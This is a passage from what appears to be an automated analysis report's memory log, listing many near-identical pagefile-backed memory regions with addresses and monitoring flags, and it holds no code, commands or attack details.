"pagefile_0x00000000044f0000" filename = "" Region: id = 9289 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9290 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9291 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9292 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9293 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9294 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9295 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9296 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9297 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9298 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9299 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9300 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9301 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9302 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9303 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9304 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9305 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9306 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9307 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9308 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9309 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9310 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9311 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9312 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9313 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9314 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9315 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9316 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9317 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9318 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9319 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9320 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9321 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9322 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9323 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9324 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9325 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9326 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9327 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9328 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9329 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9330 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9331 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9332 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9333 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9334 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9335 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9336 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9337 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9338 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9339 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9340 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9341 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9342 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9343 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9344 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9345 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9346 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9347 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9348 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9349 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9350 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9351 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9352 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9353 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9354 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9355 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9356 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9357 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9358 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9359 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9360 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9361 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9362 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9363 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9364 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9365 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9366 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9367 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9368 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9369 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9370 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9371 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9372 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9373 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9374 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9375 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9376 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9377 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9378 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9379 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9380 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9381 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9382 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9383 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9384 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9385 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9386 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9387 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9388 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9389 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9390 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9391 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9392 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9393 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9394 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9395 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9396 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9397 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9398 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9399 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9400 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9401 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9402 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9403 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9404 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9405 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9406 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9407 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9408 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9409 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9410 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9411 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9412 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9413 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9414 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9415 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9416 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9417 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9418 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9419 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9420 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9421 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9422 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9423 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9424 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9425 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9426 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9427 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9428 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9429 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9430 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9431 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9432 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9433 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9434 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9435 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9436 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9437 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9438 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9439 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9440 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9441 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9442 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9443 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9444 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9445 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9446 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9447 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9448 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9449 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9450 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9451 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9452 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9453 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9454 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9455 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9456 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9457 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9458 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9459 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9460 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9461 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9462 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9463 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9464 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9465 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9466 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9467 start_va = 